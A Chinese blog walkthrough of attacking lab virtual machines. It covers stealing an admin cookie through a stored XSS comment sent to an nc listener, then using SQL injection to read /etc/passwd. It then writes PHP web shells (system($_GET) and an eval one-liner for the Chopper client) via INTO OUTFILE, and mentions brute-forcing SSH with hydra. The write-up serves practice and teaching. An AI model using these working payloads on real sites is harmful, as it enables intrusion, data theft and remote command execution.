sql注入靶机攻击过程请参考

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

xss靶机的攻击过程请参考

https://pentesterlab.com/exercises/xss_and_mysql_file/course

在192.168.179.129机器上打开网页:

是个博客系统。

每个博客标题下面可以评价:

测试下是否存在xss漏洞。

发现提交后有弹出框:

进一步构造内容

同时在192.168.179.142机器上用nc打开80端口。

在原来机器上登陆admin账户,密码是p4ssw0rd

登陆进去后查看刚才发布的评论话题。

接着在142这台机器查看nc的返回内容。

获取到cookie信息。

复制下cookie,在142机器上打开评论所在的网页。并修改cookie的值为刚才复制的值。

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4

发现2和3可以显示出来。

http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

在查看源码时发现有css目录

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.179.130/css/s.php

显示:

说明s.php文件成功写入到/var/www/css 目录,下面将

写入z.php中,构造url为:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

下面写入一句话木马,构造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀链接:

之前发现机器开了ssh,因此用hydra爆破下:

ssh登陆

php %3c php 攻击,web 攻击靶机解题过程相关推荐

  1. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  2. xsslabs靶机解题_web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  3. 高防IP如何防止爬虫和Web攻击?

    高防IP如何防止爬虫和Web攻击?随着互联网的发展,各种类型的网络攻击和爬虫行为也越来越多.为了保护网站的安全和稳定性,许多网站都采用了高防IP来防止爬虫和Web攻击.那么高防IP是如何防止爬虫和We ...

  4. web攻击(Linux服务器)

    CC攻击 1.安装ab命令:yum -y install httpd-tools 2.发起CC攻击:ab -c 200 -n 100000 -H "host:域名" http:// ...

  5. 常见的Web攻击手段,拿捏了!

    大家好,我是小菜. 一个希望能够成为 吹着牛X谈架构 的男人!如果你也想成为我想成为的人,不然点个关注做个伴,让小菜不再孤单! 本文主要介绍 互联网中常见的 Web 攻击手段 如有需要,可以参考 如有 ...

  6. web攻击有哪些方式?小白需要知道的几种攻击方式

    Web攻击 在互联网中,攻击手段数不胜数,我们平时不能以自己只是普通的开发程序员而不是安全方向的开发者为理由,而不去掌握基本的 Web 攻击手段!我们来熟悉一下有哪几种常见的 Web 攻击手段 常见的 ...

  7. 实战:一次失败的WEB攻击试验,欢迎高手补充

    2019独角兽企业重金招聘Python工程师标准>>> 首先声明:这个文章我描述的是一次比较失败的WEB攻击试验,理论基础是一次在网上看到的一篇关于"慢攻击"的概 ...

  8. WEB攻击手段及防御第1篇-XSS

    概念 XSS全称为Cross Site Script,即跨站点脚本攻击,XSS攻击是最为普遍且中招率最多的web攻击方式,一般攻击者通过在网页恶意植入攻击脚本来篡改网页,在用户浏览网页时就能执行恶意的 ...

  9. 【技术干货】浏览器工作原理和常见WEB攻击 (下)

    本文作者:上海驻云开发总监 陈昂 上篇给大家带来的是关于浏览器基本工作原理的总结和介绍,这篇文章重点给大家说明有哪些常见WEB攻击. 常见WEB攻击 互联网是个面向全世界的开放平台,越是开放的东西漏洞 ...

最新文章

  1. Django Python:完整的BUNDLE + Django真实项目2021
  2. 避免HttpClient的”javax.net.ssl.SSLPeerUnverifiedException: peer not authenticated”异常
  3. HDOJ/HDU 1556 Color the ball(树状数组)
  4. python处理csv文件缺失值_Python:如何处理CSV中的缺失值?
  5. Linux socket / 端口复用
  6. [转载]iphone开发--改变UIPageControl里的小点的颜色
  7. 【解析】1012 The Best Rank (25 分)
  8. Highcharts的饼图大小的控制
  9. Aspose.Java实现word转pdf,添加水印等操作
  10. android生命周期_Android开发 View的生命周期结合代码详解
  11. 和“内存杀手” Chrome 说再见!新版 Edge 即将发布
  12. Android实现计时与倒计时的几种方法
  13. SQL的一个排序的问题
  14. 由软件工程看中国人急功近利的心态
  15. 7 个优秀 WordPress LMS 在线教育系统插件比较(优点和缺点)
  16. 个性化域名邮箱的配置云阿里云域名解析详细教程
  17. IOS逆向学习之路之iPod touch4 越狱心得
  18. 处理ftp登陆提示[右] 500 OOPS: cannot change directory:/home/jock11
  19. k8s-集群管理系统-KubeSphere2.1.0搭建与测试
  20. NC14745 Hungry!

热门文章

  1. 参数迁移表达的第三种形态相互作用
  2. 关于神经网络分类特征平移不变性的实验
  3. conda init 关闭和重启shell_Linux的/etc/init.d详解
  4. STM32 电机教程 5 - 步进电机基础知识介绍
  5. TCL with SNPS sizeof_collectionget_object_namefindget_libslist_attributes
  6. leetcode17 电话号码的字母组合
  7. Android开机画面~(自己还没试验)
  8. 【测试】ESP32天线信号强度比较,小龟小车A2天线esp32cam板载外置天线测试数据...
  9. 【整理】电容知识小结(二)
  10. C++ vector 容器浅析